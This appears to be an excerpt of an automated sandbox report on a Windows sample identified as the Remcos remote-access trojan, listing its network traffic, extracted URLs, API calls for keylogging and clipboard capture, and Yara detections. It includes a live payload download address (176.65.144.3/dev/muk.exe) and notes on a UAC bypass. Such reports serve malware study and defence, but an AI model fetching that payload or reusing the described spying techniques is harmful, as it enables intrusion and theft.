00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /dev/muk.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 176.65.144.3 176.65.144.3
Source: Joe Sandbox View	IP Address: 198.23.227.212 198.23.227.212
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49685 -> 178.237.33.50:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.9:49683 -> 176.65.144.3:80
Source: Network traffic	Suricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 176.65.144.3:80 -> 192.168.2.9:49683

Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_00427321 recv,

5_2_00427321

Source: global traffic	HTTP traffic detected: GET /dev/muk.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: geoplugin.net

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000003.00000002.920101626.00000000025BF000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000003.00000002.920101626.00000000025CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://176.65.144.3
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000003.00000002.920101626.000000000255B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://176.65.144.3/dev/muk.exe
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000003.00000002.920101626.000000000255F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://176.65.144.3/dev/muk.exeP
Source: powershell.exe, 00000000.00000002.920951010.0000000008890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro7T
Source: svchost.exe, 00000007.00000002.2830197472.0000028EB5600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.0000000001311000.00000004.00000020.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.0000000001311000.00000004.00000020.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.000000000132F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.0000000001311000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp9
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpWN
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.0000000001311000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gplm
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.0000000001311000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/k
Source: powershell.exe, 00000000.00000002.905324844.000000000646A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.901381384.0000000005555000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.917535137.0000000007A8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.901381384.0000000005401000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000003.00000002.920101626.00000000025BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.901381384.0000000005555000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.917535137.0000000007A8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.901381384.0000000005401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBAr
Source: powershell.exe, 00000000.00000002.905324844.000000000646A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.905324844.000000000646A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.905324844.000000000646A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: edb.log.7.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000007.00000003.1203151395.0000028EB5410000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000000.00000002.901381384.0000000005555000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.917535137.0000000007A8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.905324844.000000000646A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_00409D1E SetWindowsHookExA 0000000D,00409D0A,00000000

5_2_00409D1E

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,

5_2_0040B158

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_0041696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_0041696E

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,

5_2_0040B158

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_00409E4A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

5_2_00409E4A

Source: Yara match	File source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3371811776.0000000000481000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 3064, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3373295175.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 3064, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_0041CF2D SystemParametersInfoW,

5_2_0041CF2D

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6952, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 3064, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

PE file contains section with special chars

Source: RUNPEE.dll.3.dr

Static PE information: section name: 7}~F^E

PE file has nameless sections

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr	Static PE information: section name:
Source: RUNPEE.dll.3.dr	Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_0041DCC8 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,

5_2_0041DCC8

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_00416861 ExitWindowsEx,LoadLibraryA,GetProcAddress,

5_2_00416861

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 3_2_02380848	3_2_02380848
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 3_2_023828D0	3_2_023828D0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 3_2_023811E0	3_2_023811E0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 3_2_0238AA34	3_2_0238AA34
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 3_2_0238AA1B	3_2_0238AA1B
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 3_2_02388248	3_2_02388248
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 3_2_0238AA94	3_2_0238AA94
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 3_2_0238AAC5	3_2_0238AAC5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 3_2_02380839	3_2_02380839
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 3_2_0238A820	3_2_0238A820
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 3_2_0238A810	3_2_0238A810
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 3_2_023828C0	3_2_023828C0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_0042809D	5_2_0042809D
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_0045412B	5_2_0045412B
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_004421C0	5_2_004421C0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_004281D7	5_2_004281D7
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_0043E1E0	5_2_0043E1E0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_0041E29B	5_2_0041E29B
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_004373DA	5_2_004373DA
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00438380	5_2_00438380
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00453472	5_2_00453472
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_0042747E	5_2_0042747E
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_0043E43D	5_2_0043E43D
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_004325A1	5_2_004325A1
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_0043774C	5_2_0043774C
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_0041F809	5_2_0041F809
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_004379F6	5_2_004379F6
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_004279F5	5_2_004279F5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_0044DAD9	5_2_0044DAD9
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00433C73	5_2_00433C73
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00413CA0	5_2_00413CA0
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00437CBD	5_2_00437CBD
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_0043DD82	5_2_0043DD82
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00435F52	5_2_00435F52
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00437F78	5_2_00437F78
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_0043DFB1	5_2_0043DFB1

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\RUNPEE.dll D7108B1FF9EBBDD8DB7A32785917A848BBE9D541AE8ECDC3A58F59BF9C20084C

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 004351E0 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 00401F96 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 00401EBF appears 32 times
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 00434ACF appears 43 times
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: String function: 00402117 appears 40 times

Source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: powershell.exe PID: 6952, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 3064, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr	Static PE information: Section: R2K ZLIB complexity 1.0015345982142858
Source: RUNPEE.dll.3.dr	Static PE information: Section: 7}~F^E ZLIB complexity 1.002685546875

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winPS1@10/14@1/4

